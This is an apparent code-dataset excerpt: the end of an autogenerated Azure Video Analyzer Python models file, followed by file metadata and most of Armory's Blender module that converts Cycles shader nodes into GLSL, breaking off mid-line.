VideoScale(msrest.serialization.Model): """The video scaling information. :param height: The desired output video height. :type height: str :param width: The desired output video width. :type width: str :param mode: Describes the video scaling mode to be applied. Default mode is 'Pad'. If the mode is 'Pad' or 'Stretch' then both width and height must be specified. Else if the mode is 'PreserveAspectRatio' then only one of width or height need be provided. Possible values include: "Pad", "PreserveAspectRatio", "Stretch". :type mode: str or ~video_analyzer.models.VideoScaleMode """ _attribute_map = { 'height': {'key': 'height', 'type': 'str'}, 'width': {'key': 'width', 'type': 'str'}, 'mode': {'key': 'mode', 'type': 'str'}, } def __init__( self, **kwargs ): super(VideoScale, self).__init__(**kwargs) self.height = kwargs.get('height', None) self.width = kwargs.get('width', None) self.mode = kwargs.get('mode', None) class VideoSequenceAbsoluteTimeMarkers(TimeSequenceBase): """A sequence of absolute datetime ranges as a string. The datetime values should follow IS08601, and the sum of the ranges should add up to 24 hours or less. Currently, there can be only one range specified in the sequence. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param ranges: Required. The sequence of datetime ranges. Example: '[["2021-10-05T03:30:00Z", "2021-10-05T03:40:00Z"]]'. :type ranges: str """ _validation = { 'type': {'required': True}, 'ranges': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'ranges': {'key': 'ranges', 'type': 'str'}, } def __init__( self, **kwargs ): super(VideoSequenceAbsoluteTimeMarkers, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.VideoSequenceAbsoluteTimeMarkers' # type: str self.ranges = kwargs['ranges'] class VideoSink(SinkNodeBase): """Video sink in a live topology allows for video and audio to be captured, optionally archived, and published via a video resource. If archiving is enabled, this results in a video of type 'archive'. If used in a batch topology, this allows for video and audio to be stored as a file, and published via a video resource of type 'file'. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param name: Required. Node name. Must be unique within the topology. :type name: str :param inputs: Required. An array of upstream node references within the topology to be used as inputs for this node. :type inputs: list[~video_analyzer.models.NodeInput] :param video_name: Required. Name of a new or existing video resource used to capture and publish content. Note: if downstream of RTSP source, and if disableArchive is set to true, then no content is archived. :type video_name: str :param video_creation_properties: Optional video properties to be used in case a new video resource needs to be created on the service. :type video_creation_properties: ~video_analyzer.models.VideoCreationProperties :param video_publishing_options: Options to change how the video sink publishes content via the video resource. This property is only allowed for topologies where "kind" is set to "live". :type video_publishing_options: ~video_analyzer.models.VideoPublishingOptions """ _validation = { 'type': {'required': True}, 'name': {'required': True}, 'inputs': {'required': True}, 'video_name': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'inputs': {'key': 'inputs', 'type': '[NodeInput]'}, 'video_name': {'key': 'videoName', 'type': 'str'}, 'video_creation_properties': {'key': 'videoCreationProperties', 'type': 'VideoCreationProperties'}, 'video_publishing_options': {'key': 'videoPublishingOptions', 'type': 'VideoPublishingOptions'}, } def __init__( self, **kwargs ): super(VideoSink, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.VideoSink' # type: str self.video_name = kwargs['video_name'] self.video_creation_properties = kwargs.get('video_creation_properties', None) self.video_publishing_options = kwargs.get('video_publishing_options', None) class VideoSource(SourceNodeBase): """Video source allows for content from a Video Analyzer video resource to be ingested into a pipeline. Currently supported only with batch pipelines. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param name: Required. Node name. Must be unique within the topology. :type name: str :param video_name: Required. Name of the Video Analyzer video resource to be used as the source. :type video_name: str :param time_sequences: Required. Describes a sequence of datetime ranges. The video source only picks up recorded media within these ranges. :type time_sequences: ~video_analyzer.models.TimeSequenceBase """ _validation = { 'type': {'required': True}, 'name': {'required': True}, 'video_name': {'required': True}, 'time_sequences': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'video_name': {'key': 'videoName', 'type': 'str'}, 'time_sequences': {'key': 'timeSequences', 'type': 'TimeSequenceBase'}, } def __init__( self, **kwargs ): super(VideoSource, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.VideoSource' # type: str self.video_name = kwargs['video_name'] self.time_sequences = kwargs['time_sequences']
38.473447
815
0.658563
152,726
0.994401
0
0
0
0
0
0
106,388
0.692693
4c4fedd0e6fc912cf1a282846b6e90c655a094c7
69,123
py
Python
blender/arm/material/cycles.py
philipmduarte/armory
675211c66a1e49147226ccb472a6f5dc87b7db02
[ "Zlib" ]
1
2021-03-17T05:51:45.000Z
2021-03-17T05:51:45.000Z
blender/arm/material/cycles.py
philipmduarte/armory
675211c66a1e49147226ccb472a6f5dc87b7db02
[ "Zlib" ]
null
null
null
blender/arm/material/cycles.py
philipmduarte/armory
675211c66a1e49147226ccb472a6f5dc87b7db02
[ "Zlib" ]
null
null
null
# # This module builds upon Cycles nodes work licensed as # Copyright 2011-2013 Blender Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import math import bpy import os import arm.assets import arm.utils import arm.make_state import arm.log import arm.material.mat_state as mat_state import arm.material.cycles_functions as c_functions import shutil emission_found = False particle_info = None # Particle info export def parse(nodes, con, vert, frag, geom, tesc, tese, parse_surface=True, parse_opacity=True, parse_displacement=True, basecol_only=False): output_node = node_by_type(nodes, 'OUTPUT_MATERIAL') if output_node != None: parse_output(output_node, con, vert, frag, geom, tesc, tese, parse_surface, parse_opacity, parse_displacement, basecol_only) def parse_output(node, _con, _vert, _frag, _geom, _tesc, _tese, _parse_surface, _parse_opacity, _parse_displacement, _basecol_only): global parsed # Compute nodes only once global parents global normal_parsed global curshader # Active shader - frag for surface / tese for displacement global con global vert global frag global geom global tesc global tese global parse_surface global parse_opacity global basecol_only global emission_found global particle_info global sample_bump global sample_bump_res con = _con vert = _vert frag = _frag geom = _geom tesc = _tesc tese = _tese parse_surface = _parse_surface parse_opacity = _parse_opacity basecol_only = _basecol_only emission_found = False particle_info = {} particle_info['index'] = False particle_info['age'] = False particle_info['lifetime'] = False particle_info['location'] = False particle_info['size'] = False particle_info['velocity'] = False particle_info['angular_velocity'] = False sample_bump = False sample_bump_res = '' wrd = bpy.data.worlds['Arm'] # Surface if parse_surface or parse_opacity: parsed = {} parents = [] normal_parsed = False curshader = frag out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission = parse_shader_input(node.inputs[0]) if parse_surface: frag.write('basecol = {0};'.format(out_basecol)) frag.write('roughness = {0};'.format(out_roughness)) frag.write('metallic = {0};'.format(out_metallic)) frag.write('occlusion = {0};'.format(out_occlusion)) frag.write('specular = {0};'.format(out_specular)) if '_Emission' in wrd.world_defs: frag.write('emission = {0};'.format(out_emission)) if parse_opacity: frag.write('opacity = {0} - 0.0002;'.format(out_opacity)) # Volume # parse_volume_input(node.inputs[1]) # Displacement if _parse_displacement and disp_enabled() and node.inputs[2].is_linked: parsed = {} parents = [] normal_parsed = False rpdat = arm.utils.get_rp() if rpdat.arm_rp_displacement == 'Tessellation' and tese != None: curshader = tese else: curshader = vert out_disp = parse_displacement_input(node.inputs[2]) curshader.write('vec3 disp = {0};'.format(out_disp)) def parse_group(node, socket): # Entering group index = socket_index(node, socket) output_node = node_by_type(node.node_tree.nodes, 'GROUP_OUTPUT') if output_node == None: return inp = output_node.inputs[index] parents.append(node) out_group = parse_input(inp) parents.pop() return out_group def parse_group_input(node, socket): index = socket_index(node, socket) parent = parents.pop() # Leaving group inp = parent.inputs[index] res = parse_input(inp) parents.append(parent) # Return to group return res def parse_input(inp): if inp.type == 'SHADER': return parse_shader_input(inp) elif inp.type == 'RGB': return parse_vector_input(inp) elif inp.type == 'RGBA': return parse_vector_input(inp) elif inp.type == 'VECTOR': return parse_vector_input(inp) elif inp.type == 'VALUE': return parse_value_input(inp) def parse_shader_input(inp): if inp.is_linked: l = inp.links[0] if l.from_node.type == 'REROUTE': return parse_shader_input(l.from_node.inputs[0]) return parse_shader(l.from_node, l.from_socket) else: out_basecol = 'vec3(0.8)' out_roughness = '0.0' out_metallic = '0.0' out_occlusion = '1.0' out_specular = '1.0' out_opacity = '1.0' out_emission = '0.0' return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission def parse_shader(node, socket): global emission_found out_basecol = 'vec3(0.8)' out_roughness = '0.0' out_metallic = '0.0' out_occlusion = '1.0' out_specular = '1.0' out_opacity = '1.0' out_emission = '0.0' if node.type == 'GROUP': if node.node_tree.name.startswith('Armory PBR'): if parse_surface: # Base color out_basecol = parse_vector_input(node.inputs[0]) # Occlusion out_occlusion = parse_value_input(node.inputs[2]) # Roughness out_roughness = parse_value_input(node.inputs[3]) # Metallic out_metallic = parse_value_input(node.inputs[4]) # Normal if node.inputs[5].is_linked and node.inputs[5].links[0].from_node.type == 'NORMAL_MAP': warn(mat_name() + ' - Do not use Normal Map node with Armory PBR, connect Image Texture directly') parse_normal_map_color_input(node.inputs[5]) # Emission if node.inputs[6].is_linked or node.inputs[6].default_value != 0.0: out_emission = parse_value_input(node.inputs[6]) emission_found = True if parse_opacity: out_opacity = parse_value_input(node.inputs[1]) else: return parse_group(node, socket) elif node.type == 'GROUP_INPUT': return parse_group_input(node, socket) elif node.type == 'MIX_SHADER': prefix = '' if node.inputs[0].is_linked else 'const ' fac = parse_value_input(node.inputs[0]) fac_var = node_name(node.name) + '_fac' fac_inv_var = node_name(node.name) + '_fac_inv' curshader.write('{0}float {1} = {2};'.format(prefix, fac_var, fac)) curshader.write('{0}float {1} = 1.0 - {2};'.format(prefix, fac_inv_var, fac_var)) bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[1]) bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[2]) if parse_surface: out_basecol = '({0} * {3} + {1} * {2})'.format(bc1, bc2, fac_var, fac_inv_var) out_roughness = '({0} * {3} + {1} * {2})'.format(rough1, rough2, fac_var, fac_inv_var) out_metallic = '({0} * {3} + {1} * {2})'.format(met1, met2, fac_var, fac_inv_var) out_occlusion = '({0} * {3} + {1} * {2})'.format(occ1, occ2, fac_var, fac_inv_var) out_specular = '({0} * {3} + {1} * {2})'.format(spec1, spec2, fac_var, fac_inv_var) out_emission = '({0} * {3} + {1} * {2})'.format(emi1, emi2, fac_var, fac_inv_var) if parse_opacity: out_opacity = '({0} * {3} + {1} * {2})'.format(opac1, opac2, fac_var, fac_inv_var) elif node.type == 'ADD_SHADER': bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[0]) bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[1]) if parse_surface: out_basecol = '({0} + {1})'.format(bc1, bc2) out_roughness = '({0} * 0.5 + {1} * 0.5)'.format(rough1, rough2) out_metallic = '({0} * 0.5 + {1} * 0.5)'.format(met1, met2) out_occlusion = '({0} * 0.5 + {1} * 0.5)'.format(occ1, occ2) out_specular = '({0} * 0.5 + {1} * 0.5)'.format(spec1, spec2) out_emission = '({0} * 0.5 + {1} * 0.5)'.format(emi1, emi2) if parse_opacity: out_opacity = '({0} * 0.5 + {1} * 0.5)'.format(opac1, opac2) elif node.type == 'BSDF_PRINCIPLED': if parse_surface: write_normal(node.inputs[19]) out_basecol = parse_vector_input(node.inputs[0]) # subsurface = parse_vector_input(node.inputs[1]) # subsurface_radius = parse_vector_input(node.inputs[2]) # subsurface_color = parse_vector_input(node.inputs[3]) out_metallic = parse_value_input(node.inputs[4]) out_specular = parse_value_input(node.inputs[5]) # specular_tint = parse_vector_input(node.inputs[6]) out_roughness = parse_value_input(node.inputs[7]) # aniso = parse_vector_input(node.inputs[8]) # aniso_rot = parse_vector_input(node.inputs[9]) # sheen = parse_vector_input(node.inputs[10]) # sheen_tint = parse_vector_input(node.inputs[11]) # clearcoat = parse_vector_input(node.inputs[12]) # clearcoat_rough = parse_vector_input(node.inputs[13]) # ior = parse_vector_input(node.inputs[14]) # transmission = parse_vector_input(node.inputs[15]) # transmission_roughness = parse_vector_input(node.inputs[16]) if node.inputs[17].is_linked or node.inputs[17].default_value[0] != 0.0: out_emission = '({0}.x)'.format(parse_vector_input(node.inputs[17])) emission_found = True # clearcoar_normal = parse_vector_input(node.inputs[20]) # tangent = parse_vector_input(node.inputs[21]) if parse_opacity: if len(node.inputs) > 20: out_opacity = parse_value_input(node.inputs[18]) elif node.type == 'BSDF_DIFFUSE': if parse_surface: write_normal(node.inputs[2]) out_basecol = parse_vector_input(node.inputs[0]) out_roughness = parse_value_input(node.inputs[1]) out_specular = '0.0' elif node.type == 'BSDF_GLOSSY': if parse_surface: write_normal(node.inputs[2]) out_basecol = parse_vector_input(node.inputs[0]) out_roughness = parse_value_input(node.inputs[1]) out_metallic = '1.0' elif node.type == 'AMBIENT_OCCLUSION': if parse_surface: # Single channel out_occlusion = parse_vector_input(node.inputs[0]) + '.r' elif node.type == 'BSDF_ANISOTROPIC': if parse_surface: write_normal(node.inputs[4]) # Revert to glossy out_basecol = parse_vector_input(node.inputs[0]) out_roughness = parse_value_input(node.inputs[1]) out_metallic = '1.0' elif node.type == 'EMISSION': if parse_surface: # Multiply basecol out_basecol = parse_vector_input(node.inputs[0]) out_emission = '1.0' emission_found = True emission_strength = parse_value_input(node.inputs[1]) out_basecol = '({0} * {1})'.format(out_basecol, emission_strength) elif node.type == 'BSDF_GLASS': if parse_surface: write_normal(node.inputs[3]) out_roughness = parse_value_input(node.inputs[1]) if parse_opacity: out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0])) elif node.type == 'BSDF_HAIR': pass elif node.type == 'HOLDOUT': if parse_surface: # Occlude out_occlusion = '0.0' elif node.type == 'BSDF_REFRACTION': # write_normal(node.inputs[3]) pass elif node.type == 'SUBSURFACE_SCATTERING': if parse_surface: write_normal(node.inputs[4]) out_basecol = parse_vector_input(node.inputs[0]) elif node.type == 'BSDF_TOON': # write_normal(node.inputs[3]) pass elif node.type == 'BSDF_TRANSLUCENT': if parse_surface: write_normal(node.inputs[1]) if parse_opacity: out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0])) elif node.type == 'BSDF_TRANSPARENT': if parse_opacity: out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0])) elif node.type == 'BSDF_VELVET': if parse_surface: write_normal(node.inputs[2]) out_basecol = parse_vector_input(node.inputs[0]) out_roughness = '1.0' out_metallic = '1.0' elif node.type == 'VOLUME_ABSORPTION': pass elif node.type == 'VOLUME_SCATTER': pass return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission def parse_displacement_input(inp): if inp.is_linked: l = inp.links[0] if l.from_node.type == 'REROUTE': return parse_displacement_input(l.from_node.inputs[0]) return parse_vector_input(inp) else: return None def parse_vector_input(inp): if inp.is_linked: l = inp.links[0] if l.from_node.type == 'REROUTE': return parse_vector_input(l.from_node.inputs[0]) res_var = write_result(l) st = l.from_socket.type if st == 'RGB' or st == 'RGBA' or st == 'VECTOR': return res_var else: # VALUE return 'vec3({0})'.format(res_var) else: if inp.type == 'VALUE': # Unlinked reroute return to_vec3([0.0, 0.0, 0.0]) else: if mat_batch() and inp.is_uniform: return to_uniform(inp) else: return to_vec3(inp.default_value) def parse_vector(node, socket): global particle_info global sample_bump global sample_bump_res # RGB if node.type == 'GROUP': return parse_group(node, socket) elif node.type == 'GROUP_INPUT': return parse_group_input(node, socket) elif node.type == 'VERTEX_COLOR': con.add_elem('col', 'short4norm') # Vcols only for now return 'vcolor' elif node.type == 'ATTRIBUTE': if socket == node.outputs[0]: # Color con.add_elem('col', 'short4norm') # Vcols only for now return 'vcolor' else: # Vector con.add_elem('tex', 'short2norm') # UVMaps only for now mat = mat_get_material() mat_users = mat_get_material_users() if mat_users != None and mat in mat_users: mat_user = mat_users[mat][0] if hasattr(mat_user.data, 'uv_layers'): # No uvlayers for Curve lays = mat_user.data.uv_layers # Second uvmap referenced if len(lays) > 1 and node.attribute_name == lays[1].name: con.add_elem('tex1', 'short2norm') return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)' return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)' elif node.type == 'RGB': if node.arm_material_param: nn = 'param_' + node_name(node.name) curshader.add_uniform('vec3 {0}'.format(nn), link='{0}'.format(node.name)) return nn else: return to_vec3(socket.default_value) elif node.type == 'TEX_BRICK': curshader.add_function(c_functions.str_tex_brick) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' col1 = parse_vector_input(node.inputs[1]) col2 = parse_vector_input(node.inputs[2]) col3 = parse_vector_input(node.inputs[3]) scale = parse_value_input(node.inputs[4]) res = 'tex_brick({0} * {4}, {1}, {2}, {3})'.format(co, col1, col2, col3, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_CHECKER': curshader.add_function(c_functions.str_tex_checker) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' col1 = parse_vector_input(node.inputs[1]) col2 = parse_vector_input(node.inputs[2]) scale = parse_value_input(node.inputs[3]) res = 'tex_checker({0}, {1}, {2}, {3})'.format(co, col1, col2, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_ENVIRONMENT': # Pass through return to_vec3([0.0, 0.0, 0.0]) elif node.type == 'TEX_GRADIENT': if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' grad = node.gradient_type if grad == 'LINEAR': f = '{0}.x'.format(co) elif grad == 'QUADRATIC': f = '0.0' elif grad == 'EASING': f = '0.0' elif grad == 'DIAGONAL': f = '({0}.x + {0}.y) * 0.5'.format(co) elif grad == 'RADIAL': f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co) elif grad == 'QUADRATIC_SPHERE': f = '0.0' elif grad == 'SPHERICAL': f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co) res = 'vec3(clamp({0}, 0.0, 1.0))'.format(f) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_IMAGE': # Already fetched if is_parsed(store_var_name(node)): return '{0}.rgb'.format(store_var_name(node)) tex_name = node_name(node.name) tex = make_texture(node, tex_name) tex_link = node.name if node.arm_material_param else None if tex != None: curshader.write_textures += 1 to_linear = node.image != None and node.image.colorspace_settings.name == 'sRGB' res = '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear, tex_link=tex_link)) curshader.write_textures -= 1 return res elif node.image == None: # Empty texture tex = {} tex['name'] = tex_name tex['file'] = '' return '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear=False, tex_link=tex_link)) else: global parsed tex_store = store_var_name(node) # Pink color for missing texture parsed[tex_store] = True curshader.write_textures += 1 curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store)) curshader.write_textures -= 1 return '{0}.rgb'.format(tex_store) elif node.type == 'TEX_MAGIC': curshader.add_function(c_functions.str_tex_magic) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) res = 'tex_magic({0} * {1} * 4.0)'.format(co, scale) if sample_bump: write_bump(node, res, 0.1) return res elif node.type == 'TEX_MUSGRAVE': curshader.add_function(c_functions.str_tex_musgrave) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) # detail = parse_value_input(node.inputs[2]) # distortion = parse_value_input(node.inputs[3]) res = 'vec3(tex_musgrave_f({0} * {1} * 0.5))'.format(co, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_NOISE': curshader.add_function(c_functions.str_tex_noise) assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png') assets_add_embedded_data('noise256.png') curshader.add_uniform('sampler2D snoise256', link='$noise256.png') curshader.add_function(c_functions.str_tex_noise) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) # detail = parse_value_input(node.inputs[2]) # distortion = parse_value_input(node.inputs[3]) # Slow.. res = 'vec3(tex_noise({0} * {1}), tex_noise({0} * {1} + 0.33), tex_noise({0} * {1} + 0.66))'.format(co, scale) if sample_bump: write_bump(node, res, 0.1) return res elif node.type == 'TEX_POINTDENSITY': # Pass through return to_vec3([0.0, 0.0, 0.0]) elif node.type == 'TEX_SKY': # Pass through return to_vec3([0.0, 0.0, 0.0]) elif node.type == 'TEX_VORONOI': curshader.add_function(c_functions.str_tex_voronoi) assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png') assets_add_embedded_data('noise256.png') curshader.add_uniform('sampler2D snoise256', link='$noise256.png') if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) if node.coloring == 'INTENSITY': res = 'vec3(tex_voronoi({0} * {1}).a)'.format(co, scale) else: # CELLS res = 'tex_voronoi({0} * {1}).rgb'.format(co, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_WAVE': curshader.add_function(c_functions.str_tex_wave) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) res = 'vec3(tex_wave_f({0} * {1}))'.format(co, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'BRIGHTCONTRAST': out_col = parse_vector_input(node.inputs[0]) bright = parse_value_input(node.inputs[1]) contr = parse_value_input(node.inputs[2]) curshader.add_function(c_functions.str_brightcontrast) return 'brightcontrast({0}, {1}, {2})'.format(out_col, bright, contr) elif node.type == 'GAMMA': out_col = parse_vector_input(node.inputs[0]) gamma = parse_value_input(node.inputs[1]) return 'pow({0}, vec3({1}))'.format(out_col, gamma) elif node.type == 'HUE_SAT': curshader.add_function(c_functions.str_hue_sat) hue = parse_value_input(node.inputs[0]) sat = parse_value_input(node.inputs[1]) val = parse_value_input(node.inputs[2]) fac = parse_value_input(node.inputs[3]) col = parse_vector_input(node.inputs[4]) return 'hue_sat({0}, vec4({1}-0.5, {2}, {3}, 1.0-{4}))'.format(col, hue, sat, val, fac) elif node.type == 'INVERT': fac = parse_value_input(node.inputs[0]) out_col = parse_vector_input(node.inputs[1]) return 'mix({0}, vec3(1.0) - ({0}), {1})'.format(out_col, fac) elif node.type == 'MIX_RGB': fac = parse_value_input(node.inputs[0]) fac_var = node_name(node.name) + '_fac' curshader.write('float {0} = {1};'.format(fac_var, fac)) col1 = parse_vector_input(node.inputs[1]) col2 = parse_vector_input(node.inputs[2]) blend = node.blend_type if blend == 'MIX': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) elif blend == 'ADD': out_col = 'mix({0}, {0} + {1}, {2})'.format(col1, col2, fac_var) elif blend == 'MULTIPLY': out_col = 'mix({0}, {0} * {1}, {2})'.format(col1, col2, fac_var) elif blend == 'SUBTRACT': out_col = 'mix({0}, {0} - {1}, {2})'.format(col1, col2, fac_var) elif blend == 'SCREEN': out_col = '(vec3(1.0) - (vec3(1.0 - {2}) + {2} * (vec3(1.0) - {1})) * (vec3(1.0) - {0}))'.format(col1, col2, fac_var) elif blend == 'DIVIDE': out_col = '(vec3((1.0 - {2}) * {0} + {2} * {0} / {1}))'.format(col1, col2, fac_var) elif blend == 'DIFFERENCE': out_col = 'mix({0}, abs({0} - {1}), {2})'.format(col1, col2, fac_var) elif blend == 'DARKEN': out_col = 'min({0}, {1} * {2})'.format(col1, col2, fac_var) elif blend == 'LIGHTEN': out_col = 'max({0}, {1} * {2})'.format(col1, col2, fac_var) elif blend == 'OVERLAY': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix elif blend == 'DODGE': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix elif blend == 'BURN': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix elif blend == 'HUE': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix elif blend == 'SATURATION': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix elif blend == 'VALUE': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix elif blend == 'COLOR': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix elif blend == 'SOFT_LIGHT': out_col = '((1.0 - {2}) * {0} + {2} * ((vec3(1.0) - {0}) * {1} * {0} + {0} * (vec3(1.0) - (vec3(1.0) - {1}) * (vec3(1.0) - {0}))));'.format(col1, col2, fac) elif blend == 'LINEAR_LIGHT': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix # out_col = '({0} + {2} * (2.0 * ({1} - vec3(0.5))))'.format(col1, col2, fac_var) if node.use_clamp: return 'clamp({0}, vec3(0.0), vec3(1.0))'.format(out_col) else: return out_col elif node.type == 'BLACKBODY': t = float(parse_value_input(node.inputs[0])) rgb = [0,0,0] blackbody_table_r = [ [2.52432244e+03, -1.06185848e-03, 3.11067539e+00], [3.37763626e+03, -4.34581697e-04, 1.64843306e+00], [4.10671449e+03, -8.61949938e-05, 6.41423749e-01], [4.66849800e+03, 2.85655028e-05, 1.29075375e-01], [4.60124770e+03, 2.89727618e-05, 1.48001316e-01], [3.78765709e+03, 9.36026367e-06, 3.98995841e-01] ] blackbody_table_g = [ [-7.50343014e+02, 3.15679613e-04, 4.73464526e-01], [-1.00402363e+03, 1.29189794e-04, 9.08181524e-01], [-1.22075471e+03, 2.56245413e-05, 1.20753416e+00], [-1.42546105e+03, -4.01730887e-05, 1.44002695e+00], [-1.18134453e+03, -2.18913373e-05, 1.30656109e+00], [-5.00279505e+02, -4.59745390e-06, 1.09090465e+00] ] blackbody_table_b = [ [0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0], [-2.02524603e-11, 1.79435860e-07, -2.60561875e-04, -1.41761141e-02], [-2.22463426e-13, -1.55078698e-08, 3.81675160e-04, -7.30646033e-01], [6.72595954e-13, -2.73059993e-08, 4.24068546e-04, -7.52204323e-01] ] if (t >= 12000): rgb[0] = 0.826270103 rgb[1] = 0.994478524 rgb[2] = 1.56626022 elif (t < 965.0): rgb[0] = 4.70366907 rgb[1] = 0.0 rgb[2] = 0.0 else: if (t >= 6365.0): i = 5 elif(t >= 3315.0): i = 4 elif(t >= 1902.0): i = 3 elif(t >= 1449.0): i = 2 elif(t >= 1167.0): i = 1 else: i = 0 r = blackbody_table_r[i] g = blackbody_table_g[i] b = blackbody_table_b[i] t_inv = 1.0 / t rgb[0] = r[0] * t_inv + r[1] * t + r[2] rgb[1] = g[0] * t_inv + g[1] * t + g[2] rgb[2] = ((b[0] * t + b[1]) * t + b[2]) * t + b[3] # Pass constant return to_vec3([rgb[0], rgb[1], rgb[2]]) elif node.type == 'VALTORGB': # ColorRamp fac = parse_value_input(node.inputs[0]) interp = node.color_ramp.interpolation elems = node.color_ramp.elements if len(elems) == 1: return to_vec3(elems[0].color) # Write cols array cols_var = node_name(node.name) + '_cols' curshader.write('vec3 {0}[{1}];'.format(cols_var, len(elems))) # TODO: Make const for i in range(0, len(elems)): curshader.write('{0}[{1}] = vec3({2}, {3}, {4});'.format(cols_var, i, elems[i].color[0], elems[i].color[1], elems[i].color[2])) # Get index fac_var = node_name(node.name) + '_fac' curshader.write('float {0} = {1};'.format(fac_var, fac)) index = '0' for i in range(1, len(elems)): index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, elems[i].position) # Write index index_var = node_name(node.name) + '_i' curshader.write('int {0} = {1};'.format(index_var, index)) if interp == 'CONSTANT': return '{0}[{1}]'.format(cols_var, index_var) else: # Linear # Write facs array facs_var = node_name(node.name) + '_facs' curshader.write('float {0}[{1}];'.format(facs_var, len(elems))) # TODO: Make const for i in range(0, len(elems)): curshader.write('{0}[{1}] = {2};'.format(facs_var, i, elems[i].position)) # Mix color # float f = (pos - start) * (1.0 / (finish - start)) return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(cols_var, index_var, fac_var, facs_var) elif node.type == 'CURVE_VEC': # Vector Curves fac = parse_value_input(node.inputs[0]) vec = parse_vector_input(node.inputs[1]) curves = node.mapping.curves name = node_name(node.name) # mapping.curves[0].points[0].handle_type # bezier curve return '(vec3({0}, {1}, {2}) * {3})'.format(\ vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac) elif node.type == 'CURVE_RGB': # RGB Curves fac = parse_value_input(node.inputs[0]) vec = parse_vector_input(node.inputs[1]) curves = node.mapping.curves name = node_name(node.name) # mapping.curves[0].points[0].handle_type return '(sqrt(vec3({0}, {1}, {2}) * vec3({4}, {5}, {6})) * {3})'.format(\ vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac,\ vector_curve(name + '3a', vec + '.x', curves[3].points), vector_curve(name + '3b', vec + '.y', curves[3].points), vector_curve(name + '3c', vec + '.z', curves[3].points)) elif node.type == 'COMBHSV': curshader.add_function(c_functions.str_hue_sat) h = parse_value_input(node.inputs[0]) s = parse_value_input(node.inputs[1]) v = 